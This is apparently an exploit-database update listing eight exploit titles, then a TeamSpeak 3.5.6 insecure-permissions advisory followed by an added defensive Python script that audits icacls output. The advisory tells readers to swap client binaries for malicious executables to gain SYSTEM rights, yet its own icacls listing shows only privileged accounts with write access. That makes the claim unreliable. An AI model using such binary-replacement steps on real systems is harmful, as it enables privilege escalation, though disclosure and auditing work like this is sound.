
8 changes to exploits/shellcodes

TeamSpeak 3.5.6 - Insecure File Permissions
Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path
H3C SSL VPN - Username Enumeration
Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
ServiceNow - Username Enumeration
Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
# Date: 2022-02-15
# Exploit Author: Aryan Chehreghani
# Contact: aryanchehreghani@yahoo.com
# Vendor Homepage: https://www.teamspeak.com
# Software Link: https://www.teamspeak.com/en/downloads
# Version: 3.5.6
# Tested on: Windows 10 x64

# [ About - TeamSpeak ]:
#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP)
#application for audio communication between users on a chat channel,
#much like a telephone conference call. Users typically use headphones with a microphone.
#The client software connects to a TeamSpeak server of the user's choice, from which the user may join chat channels.
#The target audience for TeamSpeak is gamers, who can use the software to communicate
#with other players on the same team of a multiplayer video game.
#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.

# [ Description ]:
#The TeamSpeak Application was installed with insecure file permissions.
#It was found that all folder and file permissions were incorrectly configured during installation.
#It was possible to replace the service binary.

# [ POC ]:

C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe

createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)

error_report.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 WIN-FREMP1UB3LB\Administrator:(F)

package_inst.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 WIN-FREMP1UB3LB\Administrator:(F)

QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
                       BUILTIN\Administrators:(F)
                       WIN-FREMP1UB3LB\Administrator:(F)

ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)

Uninstall.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              WIN-FREMP1UB3LB\Administrator:(F)

update.exe NT AUTHORITY\SYSTEM:(F)
           BUILTIN\Administrators:(F)
           WIN-FREMP1UB3LB\Administrator:(F)

Successfully processed 7 files; Failed processing 0 files

# [ Exploit - Privilege Escalation ]:
#Replace ts3client_win32.exe, update.exe, package_inst.exe, QtWebEngineProcess.exe, createfileassoc.exe and other ...
#with any malicious executable file you want, then wait and get SYSTEM or Administrator rights (Privilege Escalation)
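
A defender-side audit for the condition named in the [ Description ] section, as an added example that is not part of the original advisory: it parses `icacls *.exe` output and reports allow ACEs that give write-capable rights to a principal outside a trusted set. The trusted set is an assumption, and `example_service.exe` with its ACL is constructed sample data; for the entry copied from the listing above, where every ACE belongs to SYSTEM, Administrators or the host's Administrator account, it reports nothing.

```python
import re

# icacls right tokens that allow a file to be replaced or modified.
WRITE_RIGHTS = {"F", "M", "W", "D", "DE", "WD", "AD", "WDAC", "WO", "GA", "GW"}
# Assumption: principals treated as already privileged on the audited host.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
           "WIN-FREMP1UB3LB\\Administrator"}  # last one: account in the listing

# "<file>.exe <principal>:(flags)" or a continuation line "<principal>:(flags)".
ACE = re.compile(
    r"^(?:(?P<file>.+?\.exe)\s+)?(?P<who>[^:]+):(?P<flags>(?:\([A-Za-z,]+\))+)$",
    re.IGNORECASE,
)

def writable_by_untrusted(icacls_text, trusted=TRUSTED):
    """Return (file, principal, rights) for allow ACEs that grant write
    access to a principal outside the trusted set."""
    trusted_lc = {t.lower() for t in trusted}
    findings, current = [], None
    for raw in icacls_text.splitlines():
        m = ACE.match(raw.strip())
        if not m:
            continue  # prompt, blank and summary lines
        current = m.group("file") or current
        tokens = set(re.findall(r"[A-Z]+", m.group("flags").upper()))
        granted = sorted(tokens & WRITE_RIGHTS)
        if "DENY" in tokens or not granted:
            continue  # deny ACEs and read/execute-only ACEs are not findings
        if m.group("who").strip().lower() not in trusted_lc:
            findings.append((current, m.group("who").strip(), granted))
    return findings

# One entry copied from the listing in the advisory.
PAGE_SAMPLE = r"""
ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)
"""

# Constructed sample (not from the advisory): a binary ordinary users can modify.
CONSTRUCTED_SAMPLE = r"""
example_service.exe NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Users:(I)(M)
                    NT AUTHORITY\Authenticated Users:(RX,W)
"""

if __name__ == "__main__":
    for sample in (PAGE_SAMPLE, CONSTRUCTED_SAMPLE):
        print(writable_by_untrusted(sample))
```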